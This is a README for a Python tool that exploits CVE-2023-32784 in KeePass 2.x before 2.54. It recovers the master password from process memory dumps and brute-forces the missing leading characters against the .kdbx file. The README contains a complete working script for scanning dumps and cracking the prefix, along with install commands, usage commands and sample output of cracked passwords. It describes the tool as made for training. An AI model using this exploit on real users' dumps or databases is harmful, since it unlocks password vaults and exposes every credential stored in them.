## https://sploitus.com/exploit?id=531DA6D8-6CE6-5EA2-9115-23DABABEBA70
# EXPLOIT_KEEPASS
A Python console program that exploits the security vulnerability CVE-2023-32784 in the password manager KeePass (KeePass 2.x before 2.54).
This exploit reconstructs the master password in plain text from memory dumps (.DMP) of the KeePass process, using the matching .kdbx database file to verify the result.
The program was created as part of my training at the Developer Academy and is used exclusively for teaching purposes.
It was coded on **Windows 10** using **VSCode** as the code editor.
## Table of Contents
1. <a href="#technologies">Technologies</a>
2. <a href="#features">Features</a>
3. <a href="#getting-started">Getting Started</a>
4. <a href="#usage">Usage</a>
5. <a href="#additional-notes">Additional Notes</a>
## Technologies
* **Python** 3.12.2
* **argparse, subprocess, os, concurrent.futures (ThreadPoolExecutor)** (modules from standard library)
* **keepass2john** 1.9.0 (<a href="https://www.openwall.com/john/">More Information</a>)
* **kpcli** 3.8.1-1.1 (<a href="https://kpcli.sourceforge.io/">More Information</a>)
## Features
The following table shows which functions **Exploit_KeePass** supports:
| Flag | Description | Required |
| ---- | ----------- | -------- |
| -h <br> --help | Get a list of the available options | no |
| -dir | Directory containing .kdbx and .DMP file pairs | yes |
**Flow of the Program**
- Extracts .kdbx and .DMP files from the specified directory.
- Maps .DMP files to corresponding .kdbx files.
- Extracts partial master passwords (the first two characters are missing) from the .DMP files using a customized version of **keepass-dump-masterkey**.
    - <a href="https://github.com/SarahZimmermann-Schmutzler/exploit_keepass/blob/main/my_poc.py">**Customized version**</a>: the first two characters of the master password are cut off.
    - <a href="https://github.com/matro7sh/keepass-dump-masterkey">**Original**</a>: the first character of the master password is missing (it cannot be recovered from memory) and the second is only a guess.
- Extracts hashes from .kdbx files using the **keepass2john** tool.
- **keepass2john** is a tool used to extract password hashes from KeePass password database files (usually .kdbx files). It is part of the John the Ripper (JtR) suite, a popular password-cracking tool.
- Links partial master passwords with .kdbx files based on their mapping.
- Performs a hybrid brute-force attack: every possible two-character combination is prepended to each partial master password, and each candidate is tested against the corresponding .kdbx file with **kpcli** until the database opens.
- **kpcli** (KeePass Command Line Interface) is a command-line tool for managing KeePass password databases (typically .kdbx files). It is written in Perl and provides a text-based interface to access, modify, and manage KeePass databases.
- Saves the results (the cracked passwords together with their hashes) in a .potfile.
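The two steps at the heart of the flow above, recovering the leftover strings from a dump and brute-forcing the two leading characters, as an added example that is not the project's own code. The leftover-string layout follows the public CVE-2023-32784 description (each keystroke leaves the previously typed characters as the bullet U+25CF followed by the new character, stored as UTF-16LE). The dump bytes are constructed inside the script so it runs offline, the function names are mine, and the `oracle` lambda stands in for the kpcli check the real tool performs:

```python
"""Added example, not the project's own code: (1) recover the leftover
master-password characters that KeePass 2.x before 2.54 leaves in process
memory (CVE-2023-32784) and (2) brute-force the two leading characters that
the customized extractor discards. The .DMP content is constructed in-line;
a real dump comes from the KeePass process (e.g. Task Manager, procdump)."""
import itertools
import string
from collections import defaultdict
from typing import Callable, Dict, Optional, Set

# SecureTextBoxEx leaves one string per keystroke in memory: the already
# typed characters as the bullet U+25CF followed by the new character, e.g.
# typing "Password" leaves "●a", "●●s", "●●●s", ... . .NET strings are
# UTF-16LE, so the bullet is the byte pair CF 25, and the first character
# of the password never appears because nothing precedes it.
BULLET = "\u25cf".encode("utf-16-le")  # b"\xcf\x25"


def build_fake_dump(password: str, noise: bytes = b"") -> bytes:
    """Constructed stand-in for a real .DMP file: the leftover strings for
    `password` interleaved with unrelated bytes and NUL terminators."""
    chunks = [noise]
    for i in range(1, len(password)):
        leftover = "\u25cf" * i + password[i]
        chunks.append(leftover.encode("utf-16-le"))
        chunks.append(b"\x00\x00" + noise)
    return b"".join(chunks)


def recover_candidates(dump: bytes, max_len: int = 64) -> Dict[int, Set[str]]:
    """Scan the dump for runs of N bullets followed by one printable UTF-16LE
    code unit and return {position: candidate characters}. Position 0 is
    never present; position 1 (a single bullet) matches unrelated data far
    more often than longer runs, which is why the original PoC treats the
    second character as a guess."""
    found: Dict[int, Set[str]] = defaultdict(set)
    pos = dump.find(BULLET)
    while pos != -1:
        n = 0
        while n < max_len and dump[pos + 2 * n: pos + 2 * n + 2] == BULLET:
            n += 1
        unit = dump[pos + 2 * n: pos + 2 * n + 2]
        if len(unit) == 2 and unit[1] == 0 and 0x20 <= unit[0] < 0x7F:
            found[n].add(chr(unit[0]))
        pos = dump.find(BULLET, pos + 2 * n)
    return dict(found)


def render_partial(found: Dict[int, Set[str]]) -> str:
    """Build the partial password; '?' marks the unrecoverable first character
    and any position with more than one candidate."""
    if not found:
        return ""
    out = []
    for i in range(max(found) + 1):
        chars = found.get(i, set())
        out.append(next(iter(chars)) if len(chars) == 1 else "?")
    return "".join(out)


def brute_force_prefix(suffix: str, check: Callable[[str], bool],
                       charset: str = string.ascii_letters + string.digits,
                       width: int = 2) -> Optional[str]:
    """The README's hybrid step: prepend every `width`-character combination
    of `charset` to the recovered suffix and test each candidate with `check`.
    In the real tool `check` wraps an attempt to open the .kdbx with kpcli;
    here any callable returning True for the right password will do."""
    for combo in itertools.product(charset, repeat=width):
        candidate = "".join(combo) + suffix
        if check(candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: the password "Password" typed into KeePass.
    dump = build_fake_dump("Password", noise=b"\x00\x00unrelated heap data\x00\x00")
    partial = render_partial(recover_candidates(dump))
    print("recovered from dump:", partial)  # ?assword
    # Mirror the customized extractor: drop the first two characters, then
    # brute-force them. The oracle lambda stands in for kpcli.
    oracle = lambda pw: pw == "Password"
    print("cracked:", brute_force_prefix(partial[2:], oracle))  # Password
```

With the default 62-character set the two-character prefix costs at most 3,844 kpcli invocations per database; widening the charset to punctuation raises that quadratically, which is the practical limit of the hybrid step.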
## Getting Started
0) <a href="https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/working-with-forks/fork-a-repo">Fork</a> the project to your namespace, if you want to make changes or open a <a href="https://docs.github.com/de/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests">Pull Request</a>.
1) <a href="https://docs.github.com/en/repositories/creating-and-managing-repositories/cloning-a-repository">Clone</a> the project to your platform if you just want to use the program.
- <ins>Example</ins>: Clone the repo, e.g. using an SSH key:
```bash
git clone git@github.com:SarahZimmermann-Schmutzler/exploit_keepass.git
```
2) Install **John the Ripper** (because **keepass2john** is part of its suite) and **kpcli** if you haven't already:
- Linux/Ubuntu:
```bash
sudo apt update && sudo apt upgrade
sudo apt install john kpcli
```
- Windows:
- Download John the Ripper <a href="https://github.com/openwall/john">Take a look here</a>
- Download kpcli <a href="https://sourceforge.net/projects/kpcli/">Take a look here</a>
## Usage
- Make sure you are in the folder where you cloned **Exploit_KeePass** into.
- Help! What options does the program support!?
```bash
python exploit_keepass.py -h
# or
python exploit_keepass.py --help
```
- To crack KeePass master passwords using .kdbx and .DMP files, use the following command in your terminal:
```bash
python exploit_keepass.py -dir [path/to/directory/with/kdbx-DMP-files]
```
- The content of the directory should look like this, with each .DMP file named after the .kdbx file it belongs to:
```
test1.DMP
test1.kdbx
test2.DMP
test2.kdbx
...
```
- <ins>Example</ins>: Crack the KeePass master passwords using the .kdbx and .DMP files from the directory *dumps* (leave the `~` unquoted so the shell expands it, or pass an absolute path):
```bash
python exploit_keepass.py -dir ~/Desktop/exploit_keepass/dumps
```
- What you see in the terminal if the brute-force attack was successful:
```
Password found for /home/User/Desktop/exploit_keepass/dumps/test1.kdbx: [password]
Password found for /home/User/Desktop/exploit_keepass/dumps/test2.kdbx: [password]
etc.
```
- What you see in the current directory if the brute-force attack was successful:
    - The file `cracked_passwords.potfile` with all hash-password pairs
## Additional Notes
The **argparse** module is used to parse (read) command line arguments in Python programs. It allows you to define arguments and options that can be passed to the program when starting it from the command line. These are then processed and are available in the program as variables.
**Subprocess** is a Python module that allows you to spawn new processes, connect to their input/output/error pipes, and obtain their return codes. It is used for interacting with external commands or programs from within your Python script. For example, you can use subprocess to run shell commands or external scripts, capture the output or handle the input of these commands and check the exit status of the executed commands to ensure they ran successfully.
The **os** module in Python is part of the standard library and provides functions to interact with the operating system. It allows you to perform tasks like working with files and directories, interacting with the environment, and managing processes. Key features include functions to create, delete, and navigate files and directories, to access and modify environment variables, to work with file paths, and to execute and manage system processes.
The **concurrent.futures** module is a standardized interface in Python that provides tools for parallel and asynchronous execution. It belongs to the standard library and provides classes and methods to execute tasks in threads or processes in parallel. **ThreadPoolExecutor** is a class that allows multiple functions or tasks to be executed in separate threads at the same time. **as_completed** is a function that takes a list of Future objects (the results of the parallel tasks) and yields them in the order in which they complete.
**ChatGPT** was involved in the creation of the program (Debugging, Prompt Engineering etc.).
I use **Google Translate** for translations from German into English.